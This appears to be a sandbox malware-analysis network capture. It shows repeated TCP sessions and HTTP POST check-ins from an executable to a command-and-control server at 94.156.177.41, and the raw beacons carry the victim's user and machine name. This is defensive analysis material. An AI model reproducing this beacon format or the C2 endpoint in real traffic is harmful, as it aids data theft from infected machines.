Jan 11, 2025 08:38:50.825320959 CET	50082	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:50.831964970 CET	80	50082	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:51.546145916 CET	80	50082	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:51.546231985 CET	80	50082	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:51.546236992 CET	50082	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:51.546272039 CET	50082	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:51.551079988 CET	80	50082	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:51.683618069 CET	50083	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:51.688596010 CET	80	50083	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:51.688697100 CET	50083	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:51.690907001 CET	50083	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:51.695697069 CET	80	50083	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:51.695758104 CET	50083	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:51.701894045 CET	80	50083	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:52.407480001 CET	80	50083	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:52.407574892 CET	80	50083	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:52.407655001 CET	50083	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:52.409246922 CET	50083	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:52.413919926 CET	80	50083	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:52.543348074 CET	50084	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:52.548300982 CET	80	50084	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:52.548491001 CET	50084	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:52.550494909 CET	50084	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:52.555346966 CET	80	50084	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:52.555444002 CET	50084	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:52.560209036 CET	80	50084	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:53.254826069 CET	80	50084	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:53.255013943 CET	50084	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:53.255095959 CET	80	50084	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:53.255155087 CET	50084	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:53.259829044 CET	80	50084	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:53.402225018 CET	50085	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:53.407216072 CET	80	50085	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:53.407310963 CET	50085	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:53.409419060 CET	50085	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:53.414285898 CET	80	50085	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:53.414346933 CET	50085	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:53.419198990 CET	80	50085	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.121906042 CET	80	50085	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.121982098 CET	80	50085	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.122050047 CET	50085	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.122102022 CET	50085	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.126952887 CET	80	50085	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.261755943 CET	50086	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.266683102 CET	80	50086	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.266765118 CET	50086	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.268899918 CET	50086	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.273757935 CET	80	50086	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.273813009 CET	50086	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.278605938 CET	80	50086	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.976531029 CET	80	50086	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.976612091 CET	80	50086	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:54.976682901 CET	50086	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.981241941 CET	50086	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:54.986031055 CET	80	50086	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:55.122245073 CET	50087	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:55.127182007 CET	80	50087	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:55.127280951 CET	50087	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:55.129506111 CET	50087	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:55.134255886 CET	80	50087	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:55.134434938 CET	50087	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:55.139210939 CET	80	50087	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:55.873589039 CET	80	50087	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:55.873720884 CET	50087	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:55.874063015 CET	80	50087	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:55.874114037 CET	50087	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:55.878499985 CET	80	50087	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.024486065 CET	50088	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.029441118 CET	80	50088	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.029525042 CET	50088	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.031610012 CET	50088	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.036405087 CET	80	50088	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.036472082 CET	50088	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.041301966 CET	80	50088	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.739826918 CET	80	50088	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.739955902 CET	80	50088	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.740057945 CET	50088	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.741947889 CET	50088	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.749089956 CET	80	50088	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.975523949 CET	50089	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.980454922 CET	80	50089	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.980597973 CET	50089	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.982789993 CET	50089	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.987576008 CET	80	50089	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:56.987644911 CET	50089	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:56.992429972 CET	80	50089	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:57.718441010 CET	80	50089	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:57.718458891 CET	80	50089	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:57.718537092 CET	50089	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:57.718803883 CET	50089	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:57.724961042 CET	80	50089	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:57.856930017 CET	50090	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:57.863008022 CET	80	50090	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:57.863101006 CET	50090	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:57.865300894 CET	50090	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:57.870093107 CET	80	50090	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:57.870196104 CET	50090	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:57.875035048 CET	80	50090	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:58.557475090 CET	80	50090	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:58.557509899 CET	80	50090	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:58.557574034 CET	50090	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:58.557718992 CET	50090	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:58.562438011 CET	80	50090	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:58.698147058 CET	50091	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:58.703257084 CET	80	50091	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:58.703356981 CET	50091	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:58.705477953 CET	50091	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:58.710417986 CET	80	50091	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:58.710491896 CET	50091	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:58.717645884 CET	80	50091	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:59.435040951 CET	80	50091	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:59.435061932 CET	80	50091	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:59.435116053 CET	50091	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:59.437942028 CET	50091	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:59.443036079 CET	80	50091	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:59.643165112 CET	50092	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:59.648169994 CET	80	50092	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:59.648266077 CET	50092	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:59.650599957 CET	50092	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:59.655447006 CET	80	50092	94.156.177.41	192.168.2.9
Jan 11, 2025 08:38:59.655514002 CET	50092	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:38:59.660335064 CET	80	50092	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:00.362013102 CET	80	50092	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:00.362087011 CET	80	50092	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:00.362102985 CET	50092	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:00.362126112 CET	50092	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:00.367122889 CET	80	50092	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:00.500139952 CET	50093	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:00.505012989 CET	80	50093	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:00.505081892 CET	50093	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:00.507380962 CET	50093	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:00.512202978 CET	80	50093	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:00.512249947 CET	50093	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:00.516980886 CET	80	50093	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:01.204404116 CET	80	50093	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:01.204571009 CET	80	50093	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:01.205420971 CET	50093	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:01.205420971 CET	50093	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:01.210267067 CET	80	50093	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:01.353055954 CET	50094	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:01.357934952 CET	80	50094	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:01.358019114 CET	50094	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:01.360174894 CET	50094	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:01.364880085 CET	80	50094	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:01.365443945 CET	50094	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:01.370199919 CET	80	50094	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:02.212785006 CET	80	50094	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:02.212877035 CET	80	50094	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:02.212934017 CET	50094	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:02.214013100 CET	50094	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:02.218803883 CET	80	50094	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:02.461507082 CET	50095	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:02.466456890 CET	80	50095	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:02.466522932 CET	50095	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:02.469041109 CET	50095	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:02.473856926 CET	80	50095	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:02.473916054 CET	50095	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:02.478705883 CET	80	50095	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:03.191502094 CET	80	50095	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:03.191539049 CET	80	50095	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:03.191625118 CET	50095	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:03.191659927 CET	50095	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:03.196479082 CET	80	50095	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:03.339409113 CET	50096	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:03.344394922 CET	80	50096	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:03.345257998 CET	50096	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:03.347358942 CET	50096	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:03.352142096 CET	80	50096	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:03.353241920 CET	50096	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:03.357980967 CET	80	50096	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.061333895 CET	80	50096	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.061353922 CET	80	50096	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.061459064 CET	50096	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.061558008 CET	50096	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.071880102 CET	80	50096	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.197942019 CET	50097	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.202897072 CET	80	50097	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.203017950 CET	50097	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.205315113 CET	50097	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.211508989 CET	80	50097	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.211637974 CET	50097	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.216541052 CET	80	50097	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.924549103 CET	80	50097	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.924582958 CET	80	50097	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:04.924707890 CET	50097	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.924707890 CET	50097	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:04.929981947 CET	80	50097	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.099818945 CET	50098	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.104753971 CET	80	50098	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.104876041 CET	50098	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.107002020 CET	50098	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.111835957 CET	80	50098	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.111898899 CET	50098	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.116761923 CET	80	50098	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.834467888 CET	80	50098	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.834552050 CET	80	50098	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.834625959 CET	50098	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.837198019 CET	50098	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.842016935 CET	80	50098	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.989985943 CET	50099	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.994901896 CET	80	50099	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:05.995007992 CET	50099	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:05.997314930 CET	50099	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.002091885 CET	80	50099	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:06.002182007 CET	50099	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.006978989 CET	80	50099	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:06.824202061 CET	80	50099	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:06.824223042 CET	80	50099	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:06.824285030 CET	50099	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.824343920 CET	50099	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.829092979 CET	80	50099	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:06.967467070 CET	50100	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.972384930 CET	80	50100	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:06.972522974 CET	50100	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.974673033 CET	50100	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.979460001 CET	80	50100	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:06.979552031 CET	50100	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:06.984375000 CET	80	50100	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:07.710124016 CET	80	50100	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:07.710150957 CET	80	50100	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:07.710238934 CET	50100	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:07.710284948 CET	50100	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:07.715117931 CET	80	50100	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:07.887309074 CET	50101	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:07.892292023 CET	80	50101	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:07.892395020 CET	50101	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:07.894459009 CET	50101	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:07.899255991 CET	80	50101	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:07.899333000 CET	50101	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:07.904181004 CET	80	50101	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:08.598738909 CET	80	50101	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:08.598762035 CET	80	50101	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:08.598891020 CET	50101	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:08.598920107 CET	50101	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:08.603707075 CET	80	50101	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:08.802526951 CET	50102	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:08.807456017 CET	80	50102	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:08.807522058 CET	50102	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:08.809762001 CET	50102	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:08.814572096 CET	80	50102	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:08.814631939 CET	50102	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:08.819499016 CET	80	50102	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:09.507545948 CET	80	50102	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:09.507575035 CET	80	50102	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:09.507654905 CET	50102	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:09.507709026 CET	50102	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:09.512456894 CET	80	50102	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:09.668975115 CET	50103	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:09.674776077 CET	80	50103	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:09.674864054 CET	50103	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:09.677052021 CET	50103	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:09.682210922 CET	80	50103	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:09.685224056 CET	50103	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:09.691055059 CET	80	50103	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:10.394455910 CET	80	50103	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:10.394506931 CET	80	50103	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:10.394620895 CET	50103	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:10.394695997 CET	50103	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:10.399430037 CET	80	50103	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:10.546247959 CET	50104	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:10.551233053 CET	80	50104	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:10.551325083 CET	50104	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:10.553579092 CET	50104	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:10.558379889 CET	80	50104	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:10.558443069 CET	50104	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:10.563266039 CET	80	50104	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:11.312309980 CET	80	50104	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:11.312333107 CET	80	50104	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:11.312422991 CET	50104	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:11.312550068 CET	50104	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:11.317425966 CET	80	50104	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:11.450741053 CET	50105	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:11.455755949 CET	80	50105	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:11.455878019 CET	50105	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:11.458076954 CET	50105	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:11.462872982 CET	80	50105	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:11.462948084 CET	50105	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:11.467763901 CET	80	50105	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:12.212040901 CET	80	50105	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:12.212096930 CET	80	50105	94.156.177.41	192.168.2.9
Jan 11, 2025 08:39:12.212304115 CET	50105	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:12.213185072 CET	50105	80	192.168.2.9	94.156.177.41
Jan 11, 2025 08:39:12.218025923 CET	80	50105	94.156.177.41	192.168.2.9

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 08:37:01.992582083 CET	1.1.1.1	192.168.2.9	0xf339	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 08:37:01.992582083 CET	1.1.1.1	192.168.2.9	0xf339	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49804	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:17.278357029 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 172 Connection: close
Jan 11, 2025 08:37:17.283199072 CET	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rutina745481TINA-PCk0FDD42EE188E931437F4FBE2C1d1ET
Jan 11, 2025 08:37:17.995059967 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49811	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:18.591609955 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 172 Connection: close
Jan 11, 2025 08:37:18.596493006 CET	172	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: 'ckav.rutina745481TINA-PC+0FDD42EE188E931437F4FBE2CKPvSP
Jan 11, 2025 08:37:19.336060047 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49817	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:37:19.425755978 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:37:19.430624962 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:37:20.138648987 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:37:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49828	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
